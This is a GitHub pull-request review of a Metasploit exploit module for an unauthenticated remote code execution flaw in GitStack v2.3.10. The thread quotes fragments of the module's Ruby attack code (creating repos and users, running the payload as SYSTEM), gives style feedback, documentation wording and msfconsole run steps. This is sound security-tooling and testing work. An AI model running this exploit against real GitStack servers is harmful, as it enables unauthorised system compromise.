Gitstack v2.3.10 RCE #9670
Conversation
I need to add references... 🤦♂️
'Platform' => 'win', | ||
'Payload' => | ||
{ | ||
'BadChars' => "\x00" |
?
'BadChars' => "\x00" | ||
}, | ||
'Targets' => [['Automatic', {}]], | ||
'Privileged' => true, |
It runs as SYSTEM?
It does run as SYSTEM.
D:
def check_web | ||
begin | ||
res = send_request_cgi({ | ||
'uri' => normalize_uri('/rest/settings/general/webinterface/'), |
Kinda don't need `normalize_uri` if you have a static URI like this.
'uri' => normalize_uri('/rest/settings/general/webinterface/'), | ||
'method' => 'GET' | ||
}) | ||
rescue Rex::ConnectionRefused, Rex::ConnectionTimeout, |
`Rex::ConnectionError` catches a lot of this.
end | ||
if res && res.code == 200 | ||
begin | ||
mylist = JSON.parse(res.body) |
`res.get_json_document`?
def create_repo | ||
repo = Rex::Text.rand_text_alpha(5) | ||
c_token = Rex::Text.rand_text_alpha(5) | ||
data = "name=#{repo}&csrfmiddlewaretoken=#{c_token}" |
`vars_post` instead.
res = send_request_cgi({ | ||
'uri' => '/rest/settings/general/webinterface/', | ||
'method' => 'PUT', | ||
'encode' => true, |
Is there a reason for this? I don't see anything that needs encoding in the URI?
payload_instance.arch.first, | ||
{ :remove_comspec => true, :encode_final_payload => true } | ||
) | ||
fail_with(Failure::PayloadFailed, "Payload is too big") if command.length > 6110 |
Might want to let the user know what this magic number means.
end | ||
|
||
r_users = repo_users(pwn_repo) | ||
unless r_users.nil? || r_users == [] |
You can use `empty?`. Or even `blank?` if you like.
'Privileged' => true, | ||
'DisclosureDate' => 'Jan 15 2018', | ||
'DefaultTarget' => 0)) | ||
register_options([Opt::RPORT(80)]) |
Either we want an extra blank line above this, or remove this line if we get RPORT from the `HttpClient` mixin.
I glossed over this. Good change.
return nil | ||
end | ||
|
||
unless mylist.length == 0 |
Maybe consider flipping this logic around per the style guide: https://github.com/bbatsov/ruby-style-guide#no-else-with-unless
end | ||
|
||
r_users = repo_users(pwn_repo) | ||
unless r_users.nil? || r_users.empty? |
Same nit as above (https://github.com/bbatsov/ruby-style-guide#no-else-with-unless), i.e.

```ruby
if !r_users.blank?
  pwn_user = create_user
  if pwn_user
    mod_user(pwn_repo, pwn_user, 'POST')
    run_exploit(pwn_repo, pwn_user, command)
    mod_user(pwn_repo, pwn_user, 'DELETE')
    delete_user(pwn_user)
  end
else
  pwn_user = r_users[0]
  run_exploit(pwn_repo, pwn_user, command)
end
```

You could also use `if r_users.present?` instead of `if !r_users.blank?`, as it's just an inversion of the return value of the `.blank?` method (but is less common in the Metasploit code; `.blank?` is more common).
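The review comments above suggest replacing the `r_users.nil? || r_users.empty?` guard with `blank?` and flipping the `unless ... else` into an `if ... else`. The block below is an added example, not code from the pull request or from Metasploit: it defines `blank_value?`/`present_value?` as a minimal stand-in for ActiveSupport's `Object#blank?`/`#present?` (which the framework loads but plain Ruby lacks), shows the flipped branch structure in `choose_user_plan` (reusing an existing user when the list is present, creating one otherwise; the module's network calls are left out), and `guard_comparison` shows where the original guard and `blank?` agree and where they differ (whitespace-only strings). The helper names and the `:reuse_existing`/`:create_new` symbols are assumptions made for the example.

```ruby
# Added example (not from the PR): a minimal stand-in for ActiveSupport's
# Object#blank? and #present?, following their documented behaviour.
# Assumption: nil, false, whitespace-only strings and empty collections are blank.
def blank_value?(value)
  case value
  when nil, false then true
  when String then value.strip.empty?
  when Array, Hash then value.empty?
  else
    value.respond_to?(:empty?) ? value.empty? : false
  end
end

def present_value?(value)
  !blank_value?(value)
end

# The branch structure from the review, written as `if ... else` instead of
# `unless ... else` (ruby-style-guide#no-else-with-unless). Returns which
# branch would run plus the user it would act on; the module's HTTP calls
# (create_user, mod_user, run_exploit, delete_user) are deliberately omitted.
def choose_user_plan(r_users)
  if present_value?(r_users)
    [:reuse_existing, r_users.first]
  else
    [:create_new, nil]
  end
end

# Compares the original guard `!(nil? || empty?)` with `present?` for a given
# value. True when both agree; false where they diverge, e.g. a whitespace-only
# string is blank? but not empty?, which matters if the API returns strings.
def guard_comparison(r_users)
  original = !(r_users.nil? || r_users.empty?)
  rewritten = present_value?(r_users)
  original == rewritten
end

if __FILE__ == $PROGRAM_NAME
  [nil, [], %w[alice bob], '   '].each do |users|
    puts "#{users.inspect}: plan=#{choose_user_plan(users).inspect} guards_agree=#{guard_comparison(users)}"
  end
end
```

`guard_comparison` is the check worth keeping in mind when swapping `nil? || empty?` for `blank?`: the two agree for `nil` and for arrays, but `blank?` also treats whitespace-only strings as empty, so the swap is only a pure style change when the value is known to be a collection.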
Nice module, @jrobles-r7! I'll see if I can get GitStack installed this afternoon for testing... 💯
@@ -0,0 +1,61 @@ | |||
## Description | |||
|
|||
This module exploits an unauthenticated remote code execution vulnerability on GitStack v2.3.10. The module will send unauthenticated REST API requests to put the application in a vulnerable state, if needed, before sending a request to trigger the exploit. These configuration changes are undone before the module exits. |
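Review bot: the description line of this hunk names only GitStack v2.3.10, while the CVE-2018-5955 entry linked in this thread covers all versions up to and including v2.3.10, so the doc should state the vulnerable range and the tested version separately (e.g. "GitStack through v2.3.10; tested on v2.3.10"). The Description should also document the payload size limit the module enforces (`fail_with(Failure::PayloadFailed, "Payload is too big") if command.length > 6110` in the module code reviewed above) and the note from the release notes that the module may need to be run more than once to produce a small enough PowerShell payload, since an operator reading only this doc otherwise has no way to tell why a run failed.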
"...vulnerability in GitStack through version v2.3.10" maybe? https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-5955
My comment was really around the fact that the CVE says that all versions up-to-and-including v2.3.10 are vulnerable. The current verbiage sounds like it's only version v2.3.10 which is vulnerable, which is not the case according to the CVE.
Oh ok. I didn't want to say the "... module exploits... through version v2.3.10" since I didn't test the exploit against earlier versions of GitStack.
It's normal to list vulnerable versions and tested versions, too.
"Versions X-Z are vulnerable. Tested on version Y." Something like that.
Works for me when targeting my Windows 10 system:
But I dawdled too long, lost my committer rights (womp womp)... So FWIW to others, it worked for me. :)
Release Notes

The `exploits/windows/http/gitstack_rce` module has been added to the framework. It exploits an unauthenticated remote code execution vulnerability on GitStack v2.3.10. The module will send unauthenticated REST API requests to put the application in a vulnerable state, if needed, before sending a request to trigger the exploit. These configuration changes are undone before the module exits. You may have to run the exploit more than once to generate a small enough PowerShell.
This module exploits an unauthenticated remote code execution vulnerability on GitStack v2.3.10. The module will send unauthenticated REST API requests to put the application in a vulnerable state, if needed, before sending a request to trigger the exploit. These configuration changes are undone before the module exits.
Verification

```
./msfconsole
use exploit/windows/http/gitstack_rce
set rhost <rhost>
set verbose true
run
```